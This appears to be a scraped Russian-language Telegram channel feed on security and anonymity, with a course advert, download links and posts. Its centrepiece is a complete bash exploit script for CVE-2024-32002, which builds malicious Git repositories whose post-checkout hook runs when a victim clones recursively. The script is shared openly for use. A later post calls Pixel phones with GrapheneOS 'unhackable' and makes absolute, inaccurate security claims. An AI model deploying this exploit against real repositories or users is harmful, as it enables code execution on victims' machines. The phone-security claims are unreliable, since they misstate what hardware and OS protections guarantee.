Канал для поиска исполнителей для разных задач и организации мини конкурсов
Last updated 2 months, 1 week ago
На курс записаться лучше сразу, я отдельно буду работать со всеми, поэтому места ограниченны.
☢️ Скоро стартует полноценный курс по безопасности и анонимности для thinkpad с Devuan 5. За основу будет взят t420, на coreboot. Также это все будет на virt-manager, защита виртуалки, установка gsec скрипта и будем собирать своё ядро на основе Linux Libre. Курс будет формате видео, будет чат для участников, видео будет выходить один раз в неделю. За подробностями пишите мне @bunkerweb
CVE-2024-32002 GIT RCE
Удаленного выполнения кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
⛔
`#!/bin/bash
# Define repository paths
HULK_REPO="[email protected]:safebuffer/hulk.git"
pullme_REPO="[email protected]:safebuffer/submod.git"
# Final Exploit Repo
SMASH_REPO="[email protected]:safebuffer/smash.git"
# Function to clone and set up the hook repository
setup_HULK_REPO() {
# Remove existing directories
rm -rf hulk*
git clone "$HULK_REPO" hulk
# Navigate to the hook repository
cd hulk/ || exit
# Create necessary directories and set up the post-checkout hook
mkdir -p y/hooks
cp ./.git/hooks/post-update.sample y/hooks/post-checkout # so u won't get the hook ignored
echo "/System/Applications/Calculator.app/Contents/MacOS/Calculator" > y/hooks/post-checkout
# Add and commit the post-checkout hook
git add y/hooks/post-checkout
git update-index --chmod=+x y/hooks/post-checkout
git commit -m "Add executable post-checkout hook"
# Push changes to the remote repository
git push
# Return to the parent directory
cd ..
}
# Function to clone and set up the pullme repository with a submodule
setup_pullme_repo() {
# Remove existing directories
rm -rf pullme*
# Clone the pullme repository
git clone "$pullme_REPO" pullme
# Navigate to the pullme repository
cd pullme || exit
# Clean up previous directories and remove submodule
rm -rf a A
git rm -r A/modules/x
# Add the hook repository as a submodule
git submodule add --name x/y "$HULK_REPO" A/modules/x
git commit -m "Add submodule"
# Create a symlink to the .git directory
# Print the string ".git" to a file named dotgit.txt
printf .git > dotgit.txt
# Generate a hash for the contents of dotgit.txt and store it in dot-git.hash
# The \-w
option writes the object to the object database, and the hash is output
git hash-object -w --stdin < dotgit.txt > dot-git.hash
# Create an index info line for a symbolic link with the mode 120000
# The line is formatted as: "120000 0\ta"
# 120000 indicates a symbolic link, is the content hash, and 'a' is the path in the index
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
# Update the git index with the information from index.info
# This effectively stages the symbolic link for the next commit
git update-index --index-info < index.info
# Commit the staged changes with a message "Add symlink"
git commit -m "Add symlink"
# Push changes to the remote repository
git push
# Return to the parent directory
cd ..
}
# Function to clone the smash repository with submodules
show_command() {
# Define color codes
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
# Output the command with colors
echo -e "${GREEN}Trigger the exploit with ${NC}:\n"
echo -e "${YELLOW}git clone --recursive ${BLUE}$SMASH_REPO ${RED}GITRCE${NC}"
}
# Execute functions
setup_HULK_REPO
setup_pullme_repo
show_command`
?Невзломаемый Pixel с Graphene OS: почему хакеры бессильны
Pixel устройства и Graphene OS создают невзломаемую систему, оставляя хакеров без шансов на успех. Вот почему:
Pixel: Фортесса безопасности
• Чип Titan M обеспечивает дополнительный уровень защиты от злонамеренных атак.
• Механизм безопасной загрузки защищает от уязвимостй в загрузочном механизме.
• Шифрование на основе аппаратного обеспечения делает невозможным эксплуатацию уязвимостей в программном обеспечении.
Graphene OS: Щит безопасности
• Модульная архитектура изолирует чувствительные компоненты, делая невозможным проникновение в систему.
• Graphene OS имеет систему контроля доступа, которая позволяет управлять доступом к чувствительной информации и ресурсам системы.
• Реальное время обнаружения угроз позволяет настроить ответ на потенциальные угрозы.
? Почему хакеры бессильны
• Многоуровневая безопасность Pixel и Graphene OS делает невозможным проникновение в систему.
• Безопасное хранение данных Graphene OS делает невозможным доступ к чувствительной информации.
• Реальное время обнаружения угроз и реагирование Graphene OS оставляет хакерам без шансов.
В заключение, сочетание Pixel устройств и Graphene OS создает невзломаемую систему, оставляя хакеров без шансов на успех.
? Secure time synchronization для AME будет прям пушка.
Нам предоставил гит подписчик, кто хочет можете юзать, спасибо ❤️
? Operating Systems Direct official Download Links
https://github.com/mrrobot1o1/OS-Downloads?tab=readme-ov-file
? Tails OS
Мнимая анонимностьРазоблачение мифа про анонимность Tails OS.
https://telegra.ph/Tails-OS-05-06-2
Ссылка на канал автора
https://t.me/+6YlYqZz7gMYyOTY6
Канал для поиска исполнителей для разных задач и организации мини конкурсов
Last updated 2 months, 1 week ago